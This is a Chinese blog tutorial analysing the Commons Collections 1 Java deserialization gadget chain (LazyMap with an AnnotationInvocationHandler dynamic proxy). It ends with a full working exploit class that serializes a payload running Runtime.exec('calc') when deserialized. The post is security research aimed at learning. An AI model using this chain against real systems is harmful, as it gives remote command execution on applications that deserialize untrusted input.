cc链1再分析

最新推荐文章于 2024-08-30 16:12:52 发布
最新推荐文章于 2024-08-30 16:12:52 发布
阅读量469 收藏
点赞数
分类专栏: javaweb 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/123947878
版权
本文详细分析了Java中的动态代理机制,特别是AnnotationInvocationHandler和LazyMap的调用链,展示了如何通过Proxy和InvocationHandler创建动态代理实例。同时,文章提到了在Java 1.8.0_71版本中对AnnotationInvocationHandler.readObject方法的修复,该修复影响了利用动态代理进行序列化的安全性。
摘要由CSDN通过智能技术生成

cc链1再分析

文章目录

cc链1有两个版本,后半条链基本相同,我们来看下另一个版本的前半条链的调用过程

调用链分析

调用链

用到了动态代理

AnnotationInvocationHandler(Proxy)-->
	Proxy(AnnotationInvocationHandler).xxx
		-->AnnotationInvocationHandler.invoke(LazyMap)
			-->Lazymap.get(ChainedTransformer)
				-->ChainedTransformer.transformer

LazyMap

调用transformer的方法那里,看LazyMap类
在这里插入图片描述

在get()方法中,调用了factory.tranformer(),看这个factory

protected final Transformer factory;

是个Transformer类对象,虽然是protected,但是可以通过decorate方法进行获取类对象

在这里插入图片描述

Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class },new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        HashMap<Object, Object> map = new HashMap<>();
        map.put("value","value");
        Map map1 = LazyMap.decorate(map, chainedTransformer);
        map1.get(Override.class);

get方法中随便传一个类,进入if语句即可
继续往下走,看谁调用了get方法

AnnotationInvocationHandler

rt.jar.reflect.annotation.AnnotationInvocationHandler

在这个类中有5个地方调用了get()方法,我们着重分析invoke方法内的调用

在这里插入图片描述

我们需要绕过这些ifswitch,去调用get方法
而在readObect中,有一行代码是执行member.entrySet(),这个参数是我们代理的AnnotationInvocationHandler类,外部调用该类方法,会去调用invoke方法

在这里插入图片描述

Proxy

		Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor annotationinvocationhandlerConstructor = c.getDeclaredConstructor(Class.class, Map.class);
        annotationinvocationhandlerConstructor.setAccessible(true);
        //实例化
        InvocationHandler h = (InvocationHandler)annotationinvocationhandlerConstructor.newInstance(Target.class,map1);

        //动态代理
        Map newProxyInstance = (Map) Proxy.newProxyInstance(LazyMap.class.getClassLoader(), new Class[]{Map.class}, h);
        Object o = annotationinvocationhandlerConstructor.newInstance(Override.class, newProxyInstance);
        serialize(o);
        unserialize("ser.bin");

而最外部还是需要一个AnnotationInvocationHandler来作为序列化的起点,其readObject方法

注意:动态代理可以序列化

最后的代码

package cc1;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;

public class cc1 {

    public static void serialize(Object obj)throws IOException {
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        objectOutputStream.writeObject(obj);
    }
    //定义unserialize方法
    public static Object unserialize(String Filename ) throws  IOException,ClassNotFoundException{
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream((Filename)));
        Object obj = objectInputStream.readObject();
        return obj;
    }
    //主函数
    public static void main(String[] args) throws Exception{
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class },new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        HashMap<Object, Object> map = new HashMap<>();
        map.put("value","value");
        Map map1 = LazyMap.decorate(map, chainedTransformer);
        //map1.get(Override.class);
        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor annotationinvocationhandlerConstructor = c.getDeclaredConstructor(Class.class, Map.class);
        annotationinvocationhandlerConstructor.setAccessible(true);
        //实例化
        InvocationHandler h = (InvocationHandler)annotationinvocationhandlerConstructor.newInstance(Target.class,map1);

        //动态代理
        Map newProxyInstance = (Map) Proxy.newProxyInstance(LazyMap.class.getClassLoader(), new Class[]{Map.class}, h);
        Object o = annotationinvocationhandlerConstructor.newInstance(Override.class, newProxyInstance);
        serialize(o);
        unserialize("ser.bin");

    }
}

版本区别

1.8.071中将AnnotationInvocationHandler.readObject进行了修复,不再调用checkValue,所以cc1不能用了

Sk1y
关注
专栏目录
Java安全(七) CC1
WDWAGAAFGAGDADSA的博客
12-24 2387
Commons Collections 1的基本知识
java安全(七) 反序列化3 CC利用 TransformedMap版
weixin_45694388的博客
04-21 3666
给个关注?宝儿! 给个关注?宝儿! 给个关注?宝儿! 关注公众号:b1gpig信息安全,文章推送不错过 众所周知,CommonCollections利⽤是作为反序列化学习不可绕i过的一关 图解 先挂一张wh1te8ea的利用图解,非常直观! 代码demo 分析: 代码使用了phith0n大佬的代码,对原本复杂的源码进行了优化,适合复现以及更加深刻理解 demo代码: package test.org.vulhub.Ser; import org.apache.commons.collecti.
cc1分析
Sk1y的博客
04-08 767
cc1分析 文章目录cc1分析jdk版本依赖测试弹计算器用反射去调用Runtime,去弹一个计算器倒序找危险函数InvokerTransformer-->transformerTransformedMapMapEntry入口AnnotationInvocationHandlerRuntime序列化ChainedTransformer类对其简化继续调试 jdk版本 jdk版本:jdk8u65 因为在jdk8u71的时候,已经修复了 下载相应的jdk版本,去下面这个接 https://www.or
java反序列化——CC1
DamnVanish的博客
08-27 1198
完整的子追踪起来还是挺复杂的,里面很多地方也都只是浅尝而止,基础还是不牢固反射机制还学的不太明白。 等多看几条子就老实了。。。
一文带你搞懂CC1(小白入门必看文章)
maple_leaf
12-03 2918
CC是利用Java反序列化漏洞进行攻击的一种方式。CC利用Apache Commons Collections库中的Transformer接口的实现类,通过巧妙的设计,将恶意代码序列化为一个对象,然后将该对象传递给一个反序列化函数,从而触发恶意代码的执行。
java安全-CC1(小宇特详解)
小宇的web博客
01-29 2962
java安全-CC1(小宇特详解) CC的前提是序列化和反序列化 序列化需要两个条件 该类必须实现java.io.Serlalizable接口 该类的所有属性必须是可序列化的,如果⼀个属性是不可序列化的,则属性必须标明是短暂的。 比如:static,transient 修饰的变量不可被序列化 注意事项: 不能new 一个Runtime类 package com.CC1; public class Demo { public static void main(String[] arg
java-CC1分析
qq_62613905的博客
01-30 499
java-CC分析
vkcc:用于从vk.cc生成短网址接的简单cli工具
02-27
vk.cc可能也采用了类似的机制,但具体的实现细节可能会有所不同,例如可能加入了自定义短码或统计分析等功能。 ### 4. 使用vkcc工具 使用vk.cc工具通常涉及以下步骤: 1. 安装vkcc:首先,你需要下载vkcc的源代码或...
JAVA反序列化CC1分析
Re_ly0n的博客
03-26 5633
反序列化的原理 首先是要继承Serialize类只有继承了这个类菜能够进行序列化,如果某一个类没有继承serialize类并在一条利用中所需要的地方,我们就可以通过反射来进行处理。例如在java中Runtime.getRuntime()是没有继承seralize类的 但是Runtime.class是继承了的 这样以来就可以通过反射来进行序列化和反序列化,反射核心代码如下 上面的代码都是可以成功弹出计算器的。利用的构造尝试使用同名不同类的方法来进行调用。在这里就是复习...
p牛java安全漫谈学习笔记(3)_CommonsCollections1(cc1)分析
qq_35976649的博客
04-06 4386
cc1(jdk6) 简化cc1-仿 使用p牛的简化cc1进行分析: package ysoserial.payloads; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import
cc2530协议栈分析
07-26
1. **熟悉硬件接口**:理解CC2530芯片的GPIO、UART、SPI、I2C等接口,知道如何配置它们以满足协议栈的需求。 2. **学习IEEE 802.15.4标准**:理解Zigbee通信的基础,包括信道选择、MAC层的帧结构、网络拓扑等。 3....
java反序列化 cc1 分析_java反序列化cc1分析(1)
m0_63174618的博客
04-07 756
既然有了可以恶意代码执行的地方,我们就还需要可以走上去的地方,这里还是需要具有transfrom方法的类,但是这时候目标就变了,我们需要的是能够触发InvokerTransformer的transfrom的类。因为一些源码是class文件,工具会帮我们自动反编译的,但是我们都知道,这个东西反编译出来的,肯定不方便阅读,所以为了方便我们后续的调试,我们这里将openjdk的源码下过来,把我们需要导入到jdk中。如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k。
Java安全入门(二)——CC1 分析+详解
热门推荐
weixin_45808483的博客
01-29 1万+
背景 在2015年11月6日FoxGlove Security安全团队的@breenmachine 发布了一篇长博客里,借用Java反序列化和Apache Commons Collections这一基础类库实现远程命令执行的真实案例来到人们的视野,各大Java Web Server纷纷躺枪,这个漏洞横扫WebLogic、WebSphere、JBoss、Jenkins、OpenNMS的最新版。 从Apache CommonsCollections 说起。 Apache C...
Java反序列化利用篇 | CC1_全网最菜的分析思路【本系列文章的分析重点】
最新发布
哦 卷!
08-30 1841
提前了解下,后面分析时不晕!!反序列化的AnnotationInvocationHandler对象中存在很多其他对象,存储在不同对象的属性中,反序列时会被使用。AnnotationInvocationHandler对象的属性Map memberValues的值为TransformedMap;TransformedMap对象的属性Transformer valueTransformer的值为ChainedTransformer;
java反序列化 cc1 分析
m0_64815693的博客
04-17 1355
java反序列化 cc1 分析
Java最新java反序列化 cc1 分析_java反序列化cc1分析(1),java面试高级题目
2301_82241883的博客
05-11 671
针对最近很多人都在面试,我这边也整理了相当多的面试专题资料,也有其他大厂的面经。希望可以帮助到大家。最新整理面试题上述的面试题答案都整理成文档笔记。也还整理了一些面试资料&最新2021收集的一些大厂的面试真题最新整理电子书最新整理大厂面试文档以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持。本文已被CODING开源项目:【一线大厂Java面试题解析+核心总结学习笔记+最新讲解视频+实战项目源码】收录需要这份系统化的资料的朋友,可以点击这里获取//再次通过反射创建代理对象。
Commons-Collections篇-CC1小白基础分析学习
鸣蜩十四的博客
05-22 1404
Apache Commons工具包中有⼀个组件叫做 Apache Commons Collections ,其封装了Java 的 Collection(集合) 相关类对象,它提供了很多强有⼒的数据结构类型并且实现了各种集合工具类,Commons Collections被⼴泛应⽤于各种Java应⽤的开发,而正是因为在大量web应⽤程序中这些类的实现以及⽅法的调用,导致了反序列化漏洞的普遍性和严重性
学习CC1碰到AnnotationInvocationHandler.java库源与类 AnnotationInvocationHandler 的字节码不符
a877558888的博客
05-09 378
只能去网上下载源版本AnnotationInvocationHandler.java,并替换本地的源文件。另外调试调用的时候,很多人看视频和文章,总感觉别人和自己的不一样。就是找不到目标,就是怪怪的。底下选择的Scope范围最好选择项目和库。如果选择 ALL place太繁杂。而设置范围的快捷键是ctrl+alt+shift+F7。可能是你的find usages没设置好范围。与jdk1.8.65这个版本对应才行。
CC++实习生笔试经验与代码分析
本次分享的是关于CC++实习生笔试卷的一些核心知识点,主要涵盖以下几个方面: 1. 基础知识: - 缩写词汇:题目要求考生熟悉编程领域的常用缩写及其含义。例如: - OS (Operating System): 操作系统。 - VS ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值